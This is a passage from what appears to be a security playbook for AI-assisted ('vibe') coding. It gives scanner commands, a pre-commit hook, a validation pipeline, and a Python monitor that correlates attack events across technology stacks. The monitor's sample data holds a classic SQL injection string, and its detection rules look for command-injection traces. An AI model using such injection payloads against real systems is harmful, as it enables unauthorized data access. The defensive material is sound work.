# SpotBugs security analysis
mvn com.github.spotbugs:spotbugs-maven-plugin:check -Dspotbugs.includeFilterFile=security-rules.xml
# Comprehensive security audit
npm audit --audit-level moderate --json > audit-report.json
# Security-focused linting
npx eslint --ext .js,.ts --config .eslintrc-security.js src/ --format json --output-file eslint-security.json
# Dependency security check with Snyk
npx snyk test --severity-threshold=medium --json > snyk-report.json
# Bundle security analysis
npx webpack-bundle-analyzer build/static/js/*.js --mode=static --report=bundle-security.html
# Security vulnerability scanning
bandit -r . -ll -f json -o bandit-security-report.json -x tests/
# Dependency security audit
pip-audit --desc --format=json --output=pip-audit-report.json
46 / 55
# Code quality with security plugins
pylint --load-plugins=pylint_security,pylint_django src/ --output-format=json > pylint-security.json
# Static type checking for security
mypy src/ --strict --show-error-codes --junit-xml=mypy-security.xml
# Static analysis with security focus
clang-tidy --checks='-*,security-*,cert-*,misc-*,readability-*' \
--header-filter='.*' src/ -- -std=c++17 > clang-tidy-security.txt
# Memory safety analysis
valgrind --tool=memcheck --leak-check=full --show-leak-kinds=all \
--track-origins=yes --verbose ./your-app > valgrind-report.txt
# Address sanitizer compilation
g++ -fsanitize=address -fsanitize=undefined -fno-omit-frame-pointer \
-g -O1 src/main.cpp -o secure-app
# Static security analysis with PVS-Studio (commercial)
pvs-studio-analyzer trace -- make
pvs-studio-analyzer analyze --output-file security-analysis.log
plog-converter -t fullhtml security-analysis.log -o security-report/
#!/bin/bash
# .git/hooks/pre-commit
# Multi-technology security validation
echo "Running multi-stack security checks..."
# .NET security check
if [ -f "*.csproj" ]; then
dotnet list package --vulnerable --include-transitive
if [ $? -ne 0 ]; then
echo " .NET security vulnerabilities found"
exit 1
fi
fi
# Java security check
if [ -f "pom.xml" ]; then
mvn org.owasp:dependency-check-maven:check -q
if [ $? -ne 0 ]; then
echo " Java security vulnerabilities found"
exit 1
fi
fi
# Node.js security check
if [ -f "package.json" ]; then
npm audit --audit-level moderate
if [ $? -ne 0 ]; then
echo " Node.js security vulnerabilities found"
exit 1
fi
fi
# Python security check
if [ -f "requirements.txt" ]; then
pip-audit --desc 47 / 55
if [ $? -ne 0 ]; then
echo " Python security vulnerabilities found"
exit 1
fi
fi
echo " All security checks passed"
exit 0
Technology Vulnerability Scan Dependency Audit Static Analysis Secret Detection
.NET/ASP.NET dotnet list package -- dotnet list package -- dotnet sonarscanner trufflehog --regex .
Core vulnerable outdated begin
Java/Spring mvn dependency- mvn versions:display- mvn sonar:sonar detect-secrets scan .
check:check dependency-updates
JavaScript/Node.js npm audit npm outdated eslint --ext secretlint "**/*"
.js,.ts src/
Python pip-audit pip list --outdated bandit -r . detect-secrets scan .
C/C++ conan inspect -- Manual library auditing clang-tidy src/ grep -r
vulnerable "password\|key" src/
# Run security-focused tests
dotnet test --filter "Category=Security"
# Static analysis with SonarQube
dotnet sonarscanner begin /k:"project-key" /d:sonar.login="token"
dotnet build
dotnet sonarscanner end /d:sonar.login="token"
# Dependency vulnerability check
dotnet list package --vulnerable --include-transitive
# Security-focused code analysis
dotnet format --verify-no-changes
dotnet build -p:TreatWarningsAsErrors=true
# Run security test suite
mvn test -Dtest="*SecurityTest"
# OWASP dependency check
mvn dependency-check:check -Dformat=JSON
# Static analysis
mvn sonar:sonar -Dsonar.projectKey=project-key
# Security vulnerability scanning
mvn org.owasp:dependency-check-maven:check
# Audit dependencies
48 / 55
npm audit --audit-level moderate
# Security linting
eslint --ext .js,.ts --config .eslintrc-security.js src/
# Runtime security testing
npm run test:security
# Bundle analysis for security
npm run analyze-bundle --security
# Security vulnerability scan
bandit -r . -f json -o bandit-report.json
# Dependency security check
pip-audit --desc --output json
# Static analysis
safety check --json
# Code quality with security focus
pylint --load-plugins=pylint_security src/
# Static analysis with security focus
clang-tidy --checks='-*,security-*,cert-*' src/
# Memory safety analysis
valgrind --tool=memcheck --leak-check=full ./app
# Address sanitizer build
gcc -fsanitize=address -fno-omit-frame-pointer src/main.c
# Security-focused compilation
gcc -D_FORTIFY_SOURCE=2 -fstack-protector-strong -Wformat-security src/
# Cross-platform security monitoring setup
./security-monitor.sh --setup-alerts --technologies=dotnet,java,nodejs,python,cpp
# Real-time vulnerability monitoring
watch -n 300 './scan-all-dependencies.sh'
# Security event correlation
./correlate-security-events.sh --time-window=1h --threshold=5
# Automated security reporting
./generate-security-report.sh --format=json --include-remediation
Generate secure [TECHNOLOGY] code for [SPECIFIC_FUNCTION] that:
SECURITY CONTEXT:
49 / 55
- Data Classification: [PUBLIC/INTERNAL/CONFIDENTIAL/RESTRICTED]
- Threat Level: [LOW/MEDIUM/HIGH/CRITICAL]
- Compliance Requirements: [PCI DSS/HIPAA/SOX/GDPR]
REQUIRED SECURITY CONTROLS:
- Authentication: [METHOD AND STRENGTH]
- Authorization: [RBAC/ABAC/POLICY-BASED]
- Input Validation: [ALLOWLIST/SCHEMA-BASED/REGEX]
- Output Encoding: [CONTEXT-SPECIFIC ENCODING]
VULNERABILITY PREVENTION:
- Primary CWE Concerns: [LIST TOP 3 CWEs FOR CONTEXT]
- Security Libraries: [SPECIFY REQUIRED SECURITY FRAMEWORKS]
- Logging Requirements: [SECURITY EVENT LOGGING LEVEL]
Generate production-ready code with inline security comments explaining each control.
.NET Enhancement Prompt:
Generate ASP.NET Core code that implements OWASP ASVS Level 2 controls:
- Apply [Authorize] with specific policies, not just roles
- Use IAuthorizationService for complex authorization logic
- Implement comprehensive input validation with custom ValidationAttributes
- Store secrets in Azure Key Vault with proper key rotation
- Use Entity Framework with explicit SQL injection protection
- Include security headers configuration and anti-forgery tokens
Java/Spring Enhancement Prompt:
Generate Spring Boot code following OWASP Java security guidelines:
- Implement method-level security with @PreAuthorize expressions
- Use Spring Security OAuth2 with proper JWT validation
- Apply Bean Validation with custom constraints for business rules
- Configure Spring Data JPA with audit logging and row-level security
- Implement CORS with environment-specific origin configuration
- Include comprehensive exception handling with security event logging
#!/bin/bash
# Multi-technology security validation pipeline
# Phase 1: Static Analysis Security Gates
run_sast_analysis() {
echo "Running multi-technology static analysis..."
# .NET Security Analysis
dotnet sonarscanner begin /k:"$PROJECT_KEY" /d:sonar.cs.roslyn.ignoreIssues=false
dotnet build
dotnet sonarscanner end
# Java Security Analysis
mvn sonar:sonar -Dsonar.projectKey=$PROJECT_KEY
mvn org.owasp:dependency-check-maven:check
# Node.js Security Analysis
npm audit --audit-level moderate
npx eslint --ext .js,.ts --config .eslintrc-security.js src/
# Python Security Analysis
bandit -r . -ll -f json -o security-report.json 50 / 55
pip-audit --desc --format=json
# C++ Security Analysis
clang-tidy --checks='-*,security-*,cert-*,readability-*' src/
}
# Phase 2: Dependency Security Validation
validate_dependencies() {
echo "Validating dependency security across all technologies..."
# Create unified vulnerability report
./create-unified-vuln-report.sh \
--dotnet $(dotnet list package --vulnerable --format json) \
--java $(mvn dependency-check:check -Dformat=JSON) \
--nodejs $(npm audit --json) \
--python $(pip-audit --format=json) \
--cpp $(./scan-cpp-deps.sh --format=json)
}
# Phase 3: Security Configuration Validation
validate_security_config() {
echo "Validating security configuration across technology stacks..."
# Verify AI assistant security rules are in place
check_ai_rules() {
[[ -f .cursorrules ]] || echo "Missing Cursor security rules"
[[ -f .cline/rules ]] || echo "Missing Cline security rules"
[[ -f CLAUDE.md ]] || echo "Missing Claude security rules"
[[ -f .github/copilot-instructions.md ]] || echo "Missing Copilot security instructions"
}
# Validate technology-specific security configurations
validate_dotnet_security_config
validate_java_security_config
validate_nodejs_security_config
validate_python_security_config
validate_cpp_security_config
}
# Phase 4: Runtime Security Validation
validate_runtime_security() {
echo "Performing runtime security validation..."
# Security-focused integration tests
dotnet test --filter "Category=SecurityIntegration"
mvn test -Dtest="*SecurityIT"
npm run test:security:integration
pytest -m security_integration
./run-cpp-security-tests.sh
}
# Main execution
main() {
run_sast_analysis
validate_dependencies
validate_security_config
validate_runtime_security
# Generate unified security report
./generate-security-dashboard.sh --all-technologies
}
main "$@"
51 / 55
# Security event correlation system for vibe-coded applications
import json
import logging
from datetime import datetime, timedelta
from dataclasses import dataclass
from typing import List, Dict, Optional
from enum import Enum
class SecurityEventType(Enum):
AUTHENTICATION_FAILURE = "auth_failure"
AUTHORIZATION_BYPASS = "authz_bypass"
INPUT_VALIDATION_FAILURE = "input_validation"
SQL_INJECTION_ATTEMPT = "sql_injection"
COMMAND_INJECTION_ATTEMPT = "command_injection"
DESERIALIZATION_ATTACK = "deserialization_attack"
BUFFER_OVERFLOW_ATTEMPT = "buffer_overflow"
@dataclass
class SecurityEvent:
timestamp: datetime
technology_stack: str
event_type: SecurityEventType
source_ip: str
user_id: Optional[str]
details: Dict
risk_score: int
class MultiStackSecurityMonitor:
def __init__(self):
self.events: List[SecurityEvent] = []
self.risk_threshold = 75
def process_dotnet_security_event(self, log_entry: Dict) -> Optional[SecurityEvent]:
"""Process .NET Core security events"""
if "Authorization failed" in log_entry.get('message', ''):
return SecurityEvent(
timestamp=datetime.fromisoformat(log_entry['timestamp']),
technology_stack='.NET Core',
event_type=SecurityEventType.AUTHORIZATION_BYPASS,
source_ip=log_entry.get('source_ip'),
user_id=log_entry.get('user_id'),
details={'endpoint': log_entry.get('endpoint'), 'action': log_entry.get('action')},
risk_score=60
)
return None
def process_java_security_event(self, log_entry: Dict) -> Optional[SecurityEvent]:
"""Process Java/Spring security events"""
if "SQL syntax error" in log_entry.get('message', '') and "'" in log_entry.get('query', ''):
return SecurityEvent(
timestamp=datetime.fromisoformat(log_entry['timestamp']),
technology_stack='Java/Spring',
event_type=SecurityEventType.SQL_INJECTION_ATTEMPT,
source_ip=log_entry.get('source_ip'),
user_id=log_entry.get('user_id'),
details={'query': log_entry.get('query'), 'parameters': log_entry.get('parameters')},
risk_score=85
)
return None
52 / 55
def process_nodejs_security_event(self, log_entry: Dict) -> Optional[SecurityEvent]:
"""Process Node.js security events"""
if "child_process" in log_entry.get('message', '') and "exec" in log_entry.get('stack_trace', ''):
return SecurityEvent(
timestamp=datetime.fromisoformat(log_entry['timestamp']),
technology_stack='Node.js',
event_type=SecurityEventType.COMMAND_INJECTION_ATTEMPT,
source_ip=log_entry.get('source_ip'),
user_id=log_entry.get('user_id'),
details={'command': log_entry.get('command'), 'arguments': log_entry.get('arguments')},
risk_score=90
)
return None
def correlate_attack_pattern(self, time_window: timedelta = timedelta(minutes=10)) -> List[Dict]:
"""Correlate security events to identify coordinated attacks"""
current_time = datetime.now()
recent_events = [
event for event in self.events
if current_time - event.timestamp <= time_window
]
# Group events by source IP
ip_events = {}
for event in recent_events:
if event.source_ip not in ip_events:
ip_events[event.source_ip] = []
ip_events[event.source_ip].append(event)
# Identify coordinated multi-stack attacks
coordinated_attacks = []
for source_ip, events in ip_events.items():
if len(events) >= 3: # Multiple events from same IP
tech_stacks = set(event.technology_stack for event in events)
if len(tech_stacks) >= 2: # Across multiple technologies
total_risk = sum(event.risk_score for event in events)
coordinated_attacks.append({
'source_ip': source_ip,
'technology_stacks': list(tech_stacks),
'total_events': len(events),
'total_risk_score': total_risk,
'attack_pattern': self._identify_attack_pattern(events)
})
return coordinated_attacks
def _identify_attack_pattern(self, events: List[SecurityEvent]) -> str:
"""Identify specific attack patterns based on event sequence"""
event_types = [event.event_type for event in events]
if (SecurityEventType.AUTHENTICATION_FAILURE in event_types and
SecurityEventType.AUTHORIZATION_BYPASS in event_types):
return "Privilege Escalation Attack"
if (SecurityEventType.SQL_INJECTION_ATTEMPT in event_types and
SecurityEventType.COMMAND_INJECTION_ATTEMPT in event_types):
return "Multi-Vector Injection Attack"
if len(set(event.technology_stack for event in events)) >= 3:
return "Cross-Technology Stack Attack"
return "Coordinated Attack"
def generate_security_alert(self, attack_info: Dict) -> Dict:
53 / 55
"""Generate comprehensive security alert for coordinated attacks"""
return {
'alert_id': f"SEC-{datetime.now().strftime('%Y%m%d-%H%M%S')}",
'timestamp': datetime.now().isoformat(),
'severity': 'CRITICAL' if attack_info['total_risk_score'] > 200 else 'HIGH',
'attack_pattern': attack_info['attack_pattern'],
'source_ip': attack_info['source_ip'],
'affected_technologies': attack_info['technology_stacks'],
'total_events': attack_info['total_events'],
'risk_score': attack_info['total_risk_score'],
'recommended_actions': [
f"Block source IP: {attack_info['source_ip']}",
"Review and strengthen authentication mechanisms",
"Audit AI-generated code in affected technology stacks",
"Implement additional input validation",
"Increase monitoring for similar attack patterns"
],
'remediation_priority': 'IMMEDIATE' if attack_info['total_risk_score'] > 250 else 'HIGH'
}
# Usage example
monitor = MultiStackSecurityMonitor()
# Process security events from different technology stacks
dotnet_event = {
'timestamp': '2024-01-15T10:30:00',
'message': 'Authorization failed for user admin_user',
'source_ip': '192.168.1.100',
'endpoint': '/api/admin/users'
}
java_event = {
'timestamp': '2024-01-15T10:32:00',
'message': 'SQL syntax error near \\'\\' OR \\'1\\'=\\'1',
'source_ip': '192.168.1.100',
'query': "SELECT * FROM users WHERE username='admin' OR '1'='1'"
}
# Process and correlate events
security_event_1 = monitor.process_dotnet_security_event(dotnet_event)
security_event_2 = monitor.process_java_security_event(java_event)
if security_event_1:
monitor.events.append(security_event_1)
if security_event_2:
monitor.events.append(security_event_2)
# Detect coordinated attacks
coordinated_attacks = monitor.correlate_attack_pattern()
for attack in coordinated_attacks:
alert = monitor.generate_security_alert(attack)
print(f"SECURITY ALERT: {json.dumps(alert, indent=2)}")
Vibe coding represents a fundamental shift in how software is developed, bringing both unprecedented productivity gains and novel
security challenges. The evidence is clear: improperly governed vibe coding creates systematic vulnerabilities that span multiple
technology stacks and amplify traditional security risks.
However, the VelociPay case study demonstrates that with proper security controls, organizations can harness AI assistance while maintaining
enterprise-grade security. The key is proactive security integration rather than reactive patching.
54 / 55
Success requires a multi-faceted approach:
1. AI Assistant Configuration: Deploy technology-specific security rules files across all development environments
2. Developer Education: Train teams on security-aware prompt engineering and AI-assisted secure coding practices
3. Automated Validation: Implement comprehensive multi-stack security scanning integrated into development workflows
4. Continuous Monitoring: Deploy security event correlation systems that detect cross-technology attack patterns
5. Cultural Integration: Establish security as an enabler of development velocity, not an impediment
Immediately deploy AI assistant security rules files for your technology stacks
Establish mandatory security review processes for AI-generated code
Implement automated security scanning in your development pipeline
Train developers on secure prompt engineering techniques
Assess current vibe coding practices and identify vulnerability patterns
Deploy multi-technology security monitoring and correlation systems
Develop security requirements and policies specific to AI-assisted development
Collaborate with development teams to integrate security into vibe coding workflows
Invest in security-aware vibe coding training and tooling
Establish clear policies and accountability for AI-generated code security
Measure security metrics specific to AI-assisted development practices
Plan for the long-term evolution of secure development practices
The future belongs to teams that master secure vibe coding. By adopting the frameworks, tools, and practices outlined in this playbook,
organizations can maintain the velocity benefits of AI-assisted development while building robust security into their applications from the ground up.
Vibe coding is not inherently insecure—ungoverned vibe coding is. With deliberate security integration, AI-assisted development becomes a
competitive advantage rather than a vulnerability multiplier.
55 / 55